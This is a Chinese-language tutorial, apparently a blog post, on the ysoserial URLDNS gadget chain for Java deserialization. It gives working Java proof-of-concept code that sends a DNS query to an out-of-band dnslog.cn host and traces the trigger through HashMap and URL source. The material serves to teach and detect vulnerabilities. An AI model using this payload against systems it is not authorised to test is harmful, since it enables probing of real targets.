本篇我们将学习ysoserial工具的URLDNS链,相对于前面学习的CC链来说,URLDNS链就比较简单了。
URLDNS是ysoserial工具用于检测是否存在Java反序列化漏洞的一个利用链,通过URLDNS利用链可以发起一次DNS查询请求,从而可以验证目标站点是否存在反序列化漏洞,并且该利用链任何不需要第三方依赖,也没有JDK版本的限制。
但是URLDNS利用链也只能用于发起DNS查询请求,也不能做其他事情,因此URLDNS链更多的是用于POC检测。
有了前面的基础,这里直接上URLDNS链的代码(URLDNS链环境为jdk1.8版本):
package com.urldns;
import java.io.*;
import java.lang.reflect.Field;
import java.net.URL;
import java.util.HashMap;
public class URLDNSTest {
public static void main(String[] args) throws Exception {
HashMap<URL, String> hashMap = new HashMap<URL, String>();
// 设置dns查询url
URL url = new URL("http://5aaub7.dnslog.cn");
// 在put前修改url的hashcode为非-1的值,put后将hashcode修改为-1
Field field = Class.forName("java.net.URL").getDeclaredField("hashCode");
field.setAccessible(true);
//修改url的hashCode字段的值,再put到hashmap中
field.set(url, 111);
hashMap.put(url, "xxxx");
//将url的hashCode修改为-1
field.set(url, -1);
ByteArrayOutputStream barr = new ByteArrayOutputStream();
//序列化
ObjectOutputStream oos = new ObjectOutputStream(barr);
oos.writeObject(hashMap);
oos.close();
//反序列化,触发漏洞
ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(barr.toByteArray()));
Object o = (Object) ois.readObject();
}
}执行程序后,URLDNS链会发送一次DNS查询的请求操作,这样我们就可以通过DNSLog平台的回显的信息来判断目标是否存在反序列化漏洞
?URLDNS链的入口是hashMap的readObject方法
private void readObject(java.io.ObjectInputStream s) throws IOException, ClassNotFoundException {
//省略部分代码......
for (int i = 0; i < mappings; i++) {
@SuppressWarnings("unchecked")
K key = (K) s.readObject();
@SuppressWarnings("unchecked")
V value = (V) s.readObject();
//还原对象
putVal(hash(key), key, value, false, false);
}
}
}hashMap调用readObject方法在反序列化时会先计算key的hash值,然后再调用putVal方法把键值对放入到hashMap中,还原对象。
hash方法内部会调用key的hashCode方法,这里的key值其实是URLDNS链中构造的url对象
static final int hash(Object key) {
int h;
//调用key的hashCode方法
return (key == null) ? 0 : (h = key.hashCode()) ^ (h >>> 16);
}key.hashCode操作实际上是调用了url对象的hashCode,判断url对象的hashCode值是否为-1,如果hashCode属性的值不为-1,说明hashCode其实已经有值了,那么会直接返回哈希值。
public synchronized int hashCode() {
if (hashCode != -1)
return hashCode;
//调用hashCode方法触发DNS查询请求
hashCode = handler.hashCode(this);
return hashCode;
}在构造URLDNS链的时候,我们通过反射将hashCode成员属性的值改回了-1
field.set(url, -1);因此这里会继续往下执行,调用handler的hashCode方法(实际上是调用了URLStreamHandler类的hashCode方法)。
URLStreamHandler类的hashCode方法内部调用了一个getHostAddress方法获取url地址,这一步会触发DNS查询请求
protected int hashCode(URL u) {
int h = 0;
//获取url协议
String protocol = u.getProtocol();
if (protocol != null)
h += protocol.hashCode();
//获取url地址
InetAddress addr = getHostAddress(u);
if (addr != null) {
h += addr.hashCode();
} else {
String host = u.getHost();
if (host != null)
h += host.toLowerCase().hashCode();
}
// Generate the file part.
String file = u.getFile();
if (file != null)
h += file.hashCode();
// Generate the port part.
if (u.getPort() == -1)
h += getDefaultPort();
else
h += u.getPort();
// Generate the ref part.
String ref = u.getRef();
if (ref != null)
h += ref.hashCode();
return h;
}
我们继续跟进getHostAddress方法,可以看到内部调用了一个getByName方法,这个方法会根据url地址返回一个ip地址,也就是说getByName方法会发送一个DNS查询请求。
其实前面构造URLDNS链时,将url对象的hashCode属性的值改回-1的目的是为了调用InetAddress.getByName方法。
URLDNS利用链的调用过程如下
参考资料:
https://xz.aliyun.com/t/9417